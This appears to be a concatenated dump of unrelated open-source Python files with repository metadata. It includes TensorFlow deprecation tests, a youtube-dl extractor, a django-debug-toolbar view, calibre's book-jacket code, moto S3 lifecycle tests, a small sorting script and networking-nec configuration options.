@deprecation.deprecated(date, instructions) def _prop(self): """prop doc. Returns: String. """ return "prop_with_doc" # Assert function docs are properly updated. self.assertEqual( "prop doc. (deprecated)" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:" "\n%s" "\n" "\nReturns:" "\n String." % (date, instructions), getattr(_Object, "_prop").__doc__) # Assert calling new fn issues log warning. self.assertEqual("prop_with_doc", _Object()._prop) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_prop_no_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." class _Object(object): def __init(self): pass @property @deprecation.deprecated(date, instructions) def _prop(self): return "prop_no_doc" # Assert function docs are properly updated. self.assertEqual( "DEPRECATED FUNCTION" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:" "\n%s" % (date, instructions), getattr(_Object, "_prop").__doc__) # Assert calling new fn issues log warning. self.assertEqual("prop_no_doc", _Object()._prop) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) class DeprecatedArgsTest(test.TestCase): def _assert_subset(self, expected_subset, actual_set): self.assertTrue( actual_set.issuperset(expected_subset), msg="%s is not a superset of %s." % (actual_set, expected_subset)) def test_deprecated_illegal_args(self): instructions = "This is how you update..." date = "2016-07-04" with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"): deprecation.deprecated_args("", instructions, "deprecated") with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"): deprecation.deprecated_args("07-04-2016", instructions, "deprecated") with self.assertRaisesRegexp(ValueError, "instructions"): deprecation.deprecated_args(date, None, "deprecated") with self.assertRaisesRegexp(ValueError, "instructions"): deprecation.deprecated_args(date, "", "deprecated") with self.assertRaisesRegexp(ValueError, "argument"): deprecation.deprecated_args(date, instructions) def test_deprecated_missing_args(self): date = "2016-07-04" instructions = "This is how you update..." def _fn(arg0, arg1, deprecated=None): return arg0 + arg1 if deprecated else arg1 + arg0 # Assert calls without the deprecated argument log nothing. with self.assertRaisesRegexp(ValueError, "not present.*\\['missing'\\]"): deprecation.deprecated_args(date, instructions, "missing")(_fn) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_with_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, "deprecated") def _fn(arg0, arg1, deprecated=True): """fn doc. Args: arg0: Arg 0. arg1: Arg 1. deprecated: Deprecated! Returns: Sum of args. """ return arg0 + arg1 if deprecated else arg1 + arg0 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "fn doc. (deprecated arguments)" "\n" "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s." "\nInstructions for updating:\n%s" "\n" "\nArgs:" "\n arg0: Arg 0." "\n arg1: Arg 1." "\n deprecated: Deprecated!" "\n" "\nReturns:" "\n Sum of args." % (date, instructions), _fn.__doc__) # Assert calls without the deprecated argument log nothing. self.assertEqual(3, _fn(1, 2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated argument log a warning. self.assertEqual(3, _fn(1, 2, True)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_with_one_line_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, "deprecated") def _fn(arg0, arg1, deprecated=True): """fn doc.""" return arg0 + arg1 if deprecated else arg1 + arg0 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "fn doc. (deprecated arguments)" "\n" "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s." "\nInstructions for updating:\n%s" % (date, instructions), _fn.__doc__) # Assert calls without the deprecated argument log nothing. self.assertEqual(3, _fn(1, 2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated argument log a warning. self.assertEqual(3, _fn(1, 2, True)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_no_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, "deprecated") def _fn(arg0, arg1, deprecated=True): return arg0 + arg1 if deprecated else arg1 + arg0 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "DEPRECATED FUNCTION ARGUMENTS" "\n" "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s." "\nInstructions for updating:" "\n%s" % (date, instructions), _fn.__doc__) # Assert calls without the deprecated argument log nothing. self.assertEqual(3, _fn(1, 2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated argument log a warning. self.assertEqual(3, _fn(1, 2, True)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_varargs(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, "deprecated") def _fn(arg0, arg1, *deprecated): return arg0 + arg1 if deprecated else arg1 + arg0 # Assert calls without the deprecated argument log nothing. self.assertEqual(3, _fn(1, 2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated argument log a warning. self.assertEqual(3, _fn(1, 2, True, False)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_kwargs(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, "deprecated") def _fn(arg0, arg1, **deprecated): return arg0 + arg1 if deprecated else arg1 + arg0 # Assert calls without the deprecated argument log nothing. self.assertEqual(3, _fn(1, 2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated argument log a warning. self.assertEqual(3, _fn(1, 2, a=True, b=False)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_positional_and_named(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, "d1", "d2") def _fn(arg0, d1=None, arg1=2, d2=None): return arg0 + arg1 if d1 else arg1 + arg0 if d2 else arg0 * arg1 # Assert calls without the deprecated arguments log nothing. self.assertEqual(2, _fn(1, arg1=2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated arguments log warnings. self.assertEqual(2, _fn(1, None, 2, d2=False)) self.assertEqual(2, mock_warning.call_count) (args1, _) = mock_warning.call_args_list[0] self.assertRegexpMatches(args1[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions, "d1"]), set(args1[1:])) (args2, _) = mock_warning.call_args_list[1] self.assertRegexpMatches(args2[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions, "d2"]), set(args2[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_positional_and_named_with_ok_vals(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, ("d1", None), ("d2", "my_ok_val")) def _fn(arg0, d1=None, arg1=2, d2=None): return arg0 + arg1 if d1 else arg1 + arg0 if d2 else arg0 * arg1 # Assert calls without the deprecated arguments log nothing. self.assertEqual(2, _fn(1, arg1=2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated arguments log warnings. self.assertEqual(2, _fn(1, False, 2, d2=False)) self.assertEqual(2, mock_warning.call_count) (args1, _) = mock_warning.call_args_list[0] self.assertRegexpMatches(args1[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions, "d1"]), set(args1[1:])) (args2, _) = mock_warning.call_args_list[1] self.assertRegexpMatches(args2[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions, "d2"]), set(args2[1:])) # Assert calls with the deprecated arguments dont log warnings if # the value matches the 'ok_val'. mock_warning.reset_mock() self.assertEqual(3, _fn(1, None, 2, d2="my_ok_val")) self.assertEqual(0, mock_warning.call_count) class DeprecatedArgValuesTest(test.TestCase): def _assert_subset(self, expected_subset, actual_set): self.assertTrue( actual_set.issuperset(expected_subset), msg="%s is not a superset of %s." % (actual_set, expected_subset)) def test_deprecated_illegal_args(self): instructions = "This is how you update..." with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"): deprecation.deprecated_arg_values("", instructions, deprecated=True) with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"): deprecation.deprecated_arg_values( "07-04-2016", instructions, deprecated=True) date = "2016-07-04" with self.assertRaisesRegexp(ValueError, "instructions"): deprecation.deprecated_arg_values(date, None, deprecated=True) with self.assertRaisesRegexp(ValueError, "instructions"): deprecation.deprecated_arg_values(date, "", deprecated=True) with self.assertRaisesRegexp(ValueError, "argument", deprecated=True): deprecation.deprecated_arg_values(date, instructions) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_with_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_arg_values(date, instructions, deprecated=True) def _fn(arg0, arg1, deprecated=True): """fn doc. Args: arg0: Arg 0. arg1: Arg 1. deprecated: Deprecated! Returns: Sum of args. """ return arg0 + arg1 if deprecated else arg1 + arg0 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "fn doc. (deprecated arguments)" "\n" "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s." "\nInstructions for updating:\n%s" "\n" "\nArgs:" "\n arg0: Arg 0." "\n arg1: Arg 1." "\n deprecated: Deprecated!" "\n" "\nReturns:" "\n Sum of args." % (date, instructions), _fn.__doc__) # Assert calling new fn with non-deprecated value logs nothing. self.assertEqual(3, _fn(1, 2, deprecated=False)) self.assertEqual(0, mock_warning.call_count) # Assert calling new fn with deprecated value issues log warning. self.assertEqual(3, _fn(1, 2, deprecated=True)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) # Assert calling new fn with default deprecated value issues log warning. self.assertEqual(3, _fn(1, 2)) self.assertEqual(2, mock_warning.call_count) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_with_one_line_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_arg_values(date, instructions, deprecated=True) def _fn(arg0, arg1, deprecated=True): """fn doc.""" return arg0 + arg1 if deprecated else arg1 + arg0 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "fn doc. (deprecated arguments)" "\n" "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s." "\nInstructions for updating:\n%s" % (date, instructions), _fn.__doc__) # Assert calling new fn with non-deprecated value logs nothing. self.assertEqual(3, _fn(1, 2, deprecated=False)) self.assertEqual(0, mock_warning.call_count) # Assert calling new fn with deprecated value issues log warning. self.assertEqual(3, _fn(1, 2, deprecated=True)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) # Assert calling new fn with default deprecated value issues log warning. self.assertEqual(3, _fn(1, 2)) self.assertEqual(2, mock_warning.call_count) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_no_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_arg_values(date, instructions, deprecated=True) def _fn(arg0, arg1, deprecated=True): return arg0 + arg1 if deprecated else arg1 + arg0 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "DEPRECATED FUNCTION ARGUMENTS" "\n" "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s." "\nInstructions for updating:" "\n%s" % (date, instructions), _fn.__doc__) # Assert calling new fn with non-deprecated value logs nothing. self.assertEqual(3, _fn(1, 2, deprecated=False)) self.assertEqual(0, mock_warning.call_count) # Assert calling new fn issues log warning. self.assertEqual(3, _fn(1, 2, deprecated=True)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) # Assert calling new fn with default deprecated value issues log warning. self.assertEqual(3, _fn(1, 2)) self.assertEqual(2, mock_warning.call_count) class DeprecationArgumentsTest(test.TestCase): def testDeprecatedArgumentLookup(self): good_value = 3 self.assertEqual( deprecation.deprecated_argument_lookup("val_new", good_value, "val_old", None), good_value) self.assertEqual( deprecation.deprecated_argument_lookup("val_new", None, "val_old", good_value), good_value) with self.assertRaisesRegexp(ValueError, "Cannot specify both 'val_old' and 'val_new'"): self.assertEqual( deprecation.deprecated_argument_lookup("val_new", good_value, "val_old", good_value), good_value) def testRewriteArgumentDocstring(self): docs = """Add `a` and `b` Args: a: first arg b: second arg """ new_docs = deprecation.rewrite_argument_docstring( deprecation.rewrite_argument_docstring(docs, "a", "left"), "b", "right") new_docs_ref = """Add `left` and `right` Args: left: first arg right: second arg """ self.assertEqual(new_docs, new_docs_ref) if __name__ == "__main__": test.main()
mit
kaltsimon/youtube-dl
youtube_dl/extractor/myspass.py
105
2721
from __future__ import unicode_literals import os.path from .common import InfoExtractor from ..compat import ( compat_urllib_parse_urlparse, ) from ..utils import ( ExtractorError, ) class MySpassIE(InfoExtractor): _VALID_URL = r'http://www\.myspass\.de/.*' _TEST = { 'url': 'http://www.myspass.de/myspass/shows/tvshows/absolute-mehrheit/Absolute-Mehrheit-vom-17022013-Die-Highlights-Teil-2--/11741/', 'md5': '0b49f4844a068f8b33f4b7c88405862b', 'info_dict': { 'id': '11741', 'ext': 'mp4', "description": "Wer kann in die Fu\u00dfstapfen von Wolfgang Kubicki treten und die Mehrheit der Zuschauer hinter sich versammeln? Wird vielleicht sogar die Absolute Mehrheit geknackt und der Jackpot von 200.000 Euro mit nach Hause genommen?", "title": "Absolute Mehrheit vom 17.02.2013 - Die Highlights, Teil 2", }, } def _real_extract(self, url): META_DATA_URL_TEMPLATE = 'http://www.myspass.de/myspass/includes/apps/video/getvideometadataxml.php?id=%s' # video id is the last path element of the URL # usually there is a trailing slash, so also try the second but last url_path = compat_urllib_parse_urlparse(url).path url_parent_path, video_id = os.path.split(url_path) if not video_id: _, video_id = os.path.split(url_parent_path) # get metadata metadata_url = META_DATA_URL_TEMPLATE % video_id metadata = self._download_xml( metadata_url, video_id, transform_source=lambda s: s.strip()) # extract values from metadata url_flv_el = metadata.find('url_flv') if url_flv_el is None: raise ExtractorError('Unable to extract download url') video_url = url_flv_el.text title_el = metadata.find('title') if title_el is None: raise ExtractorError('Unable to extract title') title = title_el.text format_id_el = metadata.find('format_id') if format_id_el is None: format = 'mp4' else: format = format_id_el.text description_el = metadata.find('description') if description_el is not None: description = description_el.text else: description = None imagePreview_el = metadata.find('imagePreview') if imagePreview_el is not None: thumbnail = imagePreview_el.text else: thumbnail = None return { 'id': video_id, 'url': video_url, 'title': title, 'format': format, 'thumbnail': thumbnail, 'description': description, }
unlicense
klenks/jobsportal
venv/lib/python2.7/site-packages/debug_toolbar/panels/templates/views.py
3
2341
from __future__ import absolute_import, unicode_literals from django.http import HttpResponseBadRequest from django.shortcuts import render_to_response from django.template import TemplateDoesNotExist from django.template.engine import Engine from django.utils.safestring import mark_safe try: from django.template import Origin except ImportError: Origin = None def template_source(request): """ Return the source of a template, syntax-highlighted by Pygments if it's available. """ template_origin_name = request.GET.get('template_origin', None) if template_origin_name is None: return HttpResponseBadRequest('"template_origin" key is required') template_name = request.GET.get('template', template_origin_name) final_loaders = [] loaders = Engine.get_default().template_loaders for loader in loaders: if loader is not None: # When the loader has loaders associated with it, # append those loaders to the list. This occurs with # django.template.loaders.cached.Loader if hasattr(loader, 'loaders'): final_loaders += loader.loaders else: final_loaders.append(loader) for loader in final_loaders: if Origin: # django>=1.9 origin = Origin(template_origin_name) try: source = loader.get_contents(origin) break except TemplateDoesNotExist: pass else: # django<1.9 try: source, _ = loader.load_template_source(template_name) break except TemplateDoesNotExist: pass else: source = "Template Does Not Exist: %s" % (template_origin_name,) try: from pygments import highlight from pygments.lexers import HtmlDjangoLexer from pygments.formatters import HtmlFormatter source = highlight(source, HtmlDjangoLexer(), HtmlFormatter()) source = mark_safe(source) source.pygmentized = True except ImportError: pass # Using render_to_response avoids running global context processors. return render_to_response('debug_toolbar/panels/template_source.html', { 'source': source, 'template_name': template_name })
mit
Eksmo/calibre
src/calibre/ebooks/oeb/transforms/jacket.py
1
8466
#!/usr/bin/env python # vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai from __future__ import with_statement __license__ = 'GPL v3' __copyright__ = '2009, Kovid Goyal <[email protected]>' __docformat__ = 'restructuredtext en' import sys from xml.sax.saxutils import escape from lxml import etree from calibre import guess_type, strftime from calibre.ebooks.BeautifulSoup import BeautifulSoup from calibre.ebooks.oeb.base import XPath, XHTML_NS, XHTML, xml2text, urldefrag from calibre.library.comments import comments_to_html from calibre.utils.date import is_date_undefined from calibre.ebooks.chardet import strip_encoding_declarations JACKET_XPATH = '//h:meta[@name="calibre-content" and @content="jacket"]' class Jacket(object): ''' Book jacket manipulation. Remove first image and insert comments at start of book. ''' def remove_images(self, item, limit=1): path = XPath('//h:img[@src]') removed = 0 for img in path(item.data): if removed >= limit: break href = item.abshref(img.get('src')) image = self.oeb.manifest.hrefs.get(href, None) if image is not None: self.oeb.manifest.remove(image) img.getparent().remove(img) removed += 1 return removed def remove_first_image(self): deleted_item = None for item in self.oeb.spine: removed = self.remove_images(item) if removed > 0: self.log('Removed first image') body = XPath('//h:body')(item.data) if body: raw = xml2text(body[0]).strip() imgs = XPath('//h:img|//svg:svg')(item.data) if not raw and not imgs: self.log('Removing %s as it has no content'%item.href) self.oeb.manifest.remove(item) deleted_item = item break if deleted_item is not None: for item in list(self.oeb.toc): href = urldefrag(item.href)[0] if href == deleted_item.href: self.oeb.toc.remove(item) def insert_metadata(self, mi): self.log('Inserting metadata into book...') try: tags = map(unicode, self.oeb.metadata.subject) except: tags = [] try: comments = unicode(self.oeb.metadata.description[0]) except: comments = '' try: title = unicode(self.oeb.metadata.title[0]) except: title = _('Unknown') root = render_jacket(mi, self.opts.output_profile, alt_title=title, alt_tags=tags, alt_comments=comments) id, href = self.oeb.manifest.generate('calibre_jacket', 'jacket.xhtml') item = self.oeb.manifest.add(id, href, guess_type(href)[0], data=root) self.oeb.spine.insert(0, item, True) self.oeb.inserted_metadata_jacket = item def remove_existing_jacket(self): for x in self.oeb.spine[:4]: if XPath(JACKET_XPATH)(x.data): self.remove_images(x, limit=sys.maxint) self.oeb.manifest.remove(x) self.log('Removed existing jacket') break def __call__(self, oeb, opts, metadata): ''' Add metadata in jacket.xhtml if specified in opts If not specified, remove previous jacket instance ''' self.oeb, self.opts, self.log = oeb, opts, oeb.log self.remove_existing_jacket() if opts.remove_first_image: self.remove_first_image() if opts.insert_metadata: self.insert_metadata(metadata) # Render Jacket {{{ def get_rating(rating, rchar, e_rchar): ans = '' try: num = float(rating)/2 except: return ans num = max(0, num) num = min(num, 5) if num < 1: return ans ans = ("%s%s") % (rchar * int(num), e_rchar * (5 - int(num))) return ans def render_jacket(mi, output_profile, alt_title=_('Unknown'), alt_tags=[], alt_comments='', alt_publisher=('')): css = P('jacket/stylesheet.css', data=True).decode('utf-8') try: title_str = mi.title if mi.title else alt_title except: title_str = _('Unknown') title = '<span class="title">%s</span>' % (escape(title_str)) series = escape(mi.series if mi.series else '') if mi.series and mi.series_index is not None: series += escape(' [%s]'%mi.format_series_index()) if not mi.series: series = '' try: publisher = mi.publisher if mi.publisher else alt_publisher except: publisher = '' try: if is_date_undefined(mi.pubdate): pubdate = '' else: pubdate = strftime(u'%Y', mi.pubdate.timetuple()) except: pubdate = '' rating = get_rating(mi.rating, output_profile.ratings_char, output_profile.empty_ratings_char) tags = mi.tags if mi.tags else alt_tags if tags: tags = output_profile.tags_to_string(tags) else: tags = '' comments = mi.comments if mi.comments else alt_comments comments = comments.strip() orig_comments = comments if comments: comments = comments_to_html(comments) try: author = mi.format_authors() except: author = '' def generate_html(comments): args = dict(xmlns=XHTML_NS, title_str=title_str, css=css, title=title, author=author, publisher=publisher, pubdate_label=_('Published'), pubdate=pubdate, series_label=_('Series'), series=series, rating_label=_('Rating'), rating=rating, tags_label=_('Tags'), tags=tags, comments=comments, footer='' ) for key in mi.custom_field_keys(): try: display_name, val = mi.format_field_extended(key)[:2] key = key.replace('#', '_') args[key] = escape(val) args[key+'_label'] = escape(display_name) except: pass # Used in the comment describing use of custom columns in templates args['_genre_label'] = args.get('_genre_label', '{_genre_label}') args['_genre'] = args.get('_genre', '{_genre}') generated_html = P('jacket/template.xhtml', data=True).decode('utf-8').format(**args) # Post-process the generated html to strip out empty header items soup = BeautifulSoup(generated_html) if not series: series_tag = soup.find(attrs={'class':'cbj_series'}) if series_tag is not None: series_tag.extract() if not rating: rating_tag = soup.find(attrs={'class':'cbj_rating'}) if rating_tag is not None: rating_tag.extract() if not tags: tags_tag = soup.find(attrs={'class':'cbj_tags'}) if tags_tag is not None: tags_tag.extract() if not pubdate: pubdate_tag = soup.find(attrs={'class':'cbj_pubdata'}) if pubdate_tag is not None: pubdate_tag.extract() if output_profile.short_name != 'kindle': hr_tag = soup.find('hr', attrs={'class':'cbj_kindle_banner_hr'}) if hr_tag is not None: hr_tag.extract() return strip_encoding_declarations( soup.renderContents('utf-8').decode('utf-8')) from calibre.ebooks.oeb.base import RECOVER_PARSER try: root = etree.fromstring(generate_html(comments), parser=RECOVER_PARSER) except: try: root = etree.fromstring(generate_html(escape(orig_comments)), parser=RECOVER_PARSER) except: root = etree.fromstring(generate_html(''), parser=RECOVER_PARSER) return root # }}} def linearize_jacket(oeb): for x in oeb.spine[:4]: if XPath(JACKET_XPATH)(x.data): for e in XPath('//h:table|//h:tr|//h:th')(x.data): e.tag = XHTML('div') for e in XPath('//h:td')(x.data): e.tag = XHTML('span') break
gpl-3.0
araines/moto
tests/test_s3/test_s3_lifecycle.py
18
3339
from __future__ import unicode_literals import boto from boto.exception import S3ResponseError from boto.s3.lifecycle import Lifecycle, Transition, Expiration, Rule import sure # noqa from moto import mock_s3 @mock_s3 def test_lifecycle_create(): conn = boto.s3.connect_to_region("us-west-1") bucket = conn.create_bucket("foobar") lifecycle = Lifecycle() lifecycle.add_rule('myid', '', 'Enabled', 30) bucket.configure_lifecycle(lifecycle) response = bucket.get_lifecycle_config() len(response).should.equal(1) lifecycle = response[0] lifecycle.id.should.equal('myid') lifecycle.prefix.should.equal('') lifecycle.status.should.equal('Enabled') lifecycle.transition.should.equal(None) @mock_s3 def test_lifecycle_with_glacier_transition(): conn = boto.s3.connect_to_region("us-west-1") bucket = conn.create_bucket("foobar") lifecycle = Lifecycle() transition = Transition(days=30, storage_class='GLACIER') rule = Rule('myid', prefix='', status='Enabled', expiration=None, transition=transition) lifecycle.append(rule) bucket.configure_lifecycle(lifecycle) response = bucket.get_lifecycle_config() transition = response[0].transition transition.days.should.equal(30) transition.storage_class.should.equal('GLACIER') transition.date.should.equal(None) @mock_s3 def test_lifecycle_multi(): conn = boto.s3.connect_to_region("us-west-1") bucket = conn.create_bucket("foobar") date = '2022-10-12T00:00:00.000Z' sc = 'GLACIER' lifecycle = Lifecycle() lifecycle.add_rule("1", "1/", "Enabled", 1) lifecycle.add_rule("2", "2/", "Enabled", Expiration(days=2)) lifecycle.add_rule("3", "3/", "Enabled", Expiration(date=date)) lifecycle.add_rule("4", "4/", "Enabled", None, Transition(days=4, storage_class=sc)) lifecycle.add_rule("5", "5/", "Enabled", None, Transition(date=date, storage_class=sc)) bucket.configure_lifecycle(lifecycle) # read the lifecycle back rules = bucket.get_lifecycle_config() for rule in rules: if rule.id == "1": rule.prefix.should.equal("1/") rule.expiration.days.should.equal(1) elif rule.id == "2": rule.prefix.should.equal("2/") rule.expiration.days.should.equal(2) elif rule.id == "3": rule.prefix.should.equal("3/") rule.expiration.date.should.equal(date) elif rule.id == "4": rule.prefix.should.equal("4/") rule.transition.days.should.equal(4) rule.transition.storage_class.should.equal(sc) elif rule.id == "5": rule.prefix.should.equal("5/") rule.transition.date.should.equal(date) rule.transition.storage_class.should.equal(sc) else: assert False, "Invalid rule id" @mock_s3 def test_lifecycle_delete(): conn = boto.s3.connect_to_region("us-west-1") bucket = conn.create_bucket("foobar") lifecycle = Lifecycle() lifecycle.add_rule(expiration=30) bucket.configure_lifecycle(lifecycle) response = bucket.get_lifecycle_config() response.should.have.length_of(1) bucket.delete_lifecycle_configuration() bucket.get_lifecycle_config.when.called_with().should.throw(S3ResponseError)
apache-2.0
bourneagain/pythonBytes
quickSort.py
1
1075
œœdef kthlargest(arr1, arr2, k): if len(arr1) == 0: return arr2[k] elif len(arr2) == 0: return arr1[k] mida1 = len(arr1)/2 mida2 = len(arr2)/2 if mida1+mida2<k: if arr1[mida1]>arr2[mida2]: return kthlargest(arr1, arr2[mida2+1:], k-mida2-1) else: return kthlargest(arr1[mida1+1:], arr2, k-mida1-1) else: if arr1[mida1]>arr2[mida2]: return kthlargest(arr1[:mida1], arr2, k) else: return kthlargest(arr1, arr2[:mida2], k) # def quickSort(arr): # less = [] # pivotList = [] # more = [] # if len(arr) <= 1: # return arr # else: # pivot = arr[0] # for i in arr: # if i < pivot: # less.append(i) # elif i > pivot: # more.append(i) # else: # pivotList.append(i) # less = quickSort(less) # more = quickSort(more) # return less + pivotList + more # a = [4, 65, 2, -31, 0, 99, 83, 782, 1] # a = quickSort(a)
mit
stackforge/networking-nec
networking_nec/nwa/common/config.py
2
4009
# Copyright 2015-2016 NEC Corporation. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from neutron.agent.common import config from oslo_config import cfg from networking_nec._i18n import _ agent_opts = [ cfg.IntOpt('polling_interval', default=2, help=_("The number of seconds the agent will wait between " "polling for local device changes.")), ] cfg.CONF.register_opts(agent_opts, "AGENT") config.register_agent_state_opts_helper(cfg.CONF) # nwa.ini NWA_opts = [ cfg.StrOpt('server_url', help=_("URL for NWA REST API.")), cfg.StrOpt('access_key_id', help=_("Access ID for NWA REST API.")), cfg.StrOpt('secret_access_key', help=_("Secret key for NWA REST API.")), cfg.StrOpt('resource_group_name', help=_( "Resouce Group Name specified at creating tenant NW.")), cfg.StrOpt('region_name', help=_("RegionName for DC."), default='RegionOne'), cfg.IntOpt('scenario_polling_first_timer', default=2, help=_("Timer value for the first scenario status polling.")), cfg.IntOpt('scenario_polling_timer', default=10, help=_("Timer value for polling scenario status.")), cfg.IntOpt('scenario_polling_count', default=6, help=_("Count value for polling scenario status.")), cfg.BoolOpt('use_necnwa_router', help=_("Using necnwa_router instead of the l3-router"), default=True), cfg.BoolOpt('use_neutron_vlan_id', help=_("Using vlan id of neutron instead of NWA"), default=False), cfg.StrOpt('ironic_az_prefix', help=_("The prefix name of device_owner used in ironic"), default='BM_'), cfg.BoolOpt('use_setting_fw_policy', default=False, help=_('Using setting_fw_policy as default')), cfg.StrOpt('resource_group_file', help=_("JSON file which defines relations between " "physical network of OpenStack and NWA.")), cfg.StrOpt('resource_group', deprecated_for_removal=True, deprecated_reason='In favor of resource_group_file option.', help=_(""" Relations between physical network of OpenStack and NWA. ex) [ { "physical_network": "physnet1", "ResourceGroupName":"Core/Hypervisor/HV-RG01" }, { ... }, ]""")), cfg.StrOpt('lbaas_driver', help=_("LBaaS Driver Name")), cfg.StrOpt('fwaas_driver', help=_("Firewall Driver Name")), ] Scenario_opts = [ cfg.StrOpt('CreateTenantFW', help=_("Scenario ID for the scenario CreateTenantFW.")), cfg.StrOpt('CreateTenantNW', help=_("Scenario ID for the scenario CreateTenantNW.")), cfg.StrOpt('CreateVLAN', help=_("Scenario ID for the scenario CreateVLAN.")), cfg.StrOpt('CreateGeneralDev', help=_( "Scenario ID for the scenario CreateGeneralDev.")), cfg.StrOpt('UpdateTenantFW', help=_("Scenario ID for the scenario UpdateTenantFW.")), cfg.StrOpt('SettingNAT', help=_("Scenario ID for the scenario SettingNAT.")), ] cfg.CONF.register_opts(NWA_opts, "NWA") cfg.CONF.register_opts(Scenario_opts, "Scenario")
apache-2.0
ergoregion/Rota-Program
Rota_System/UI/People/widget_population.py
1
1876
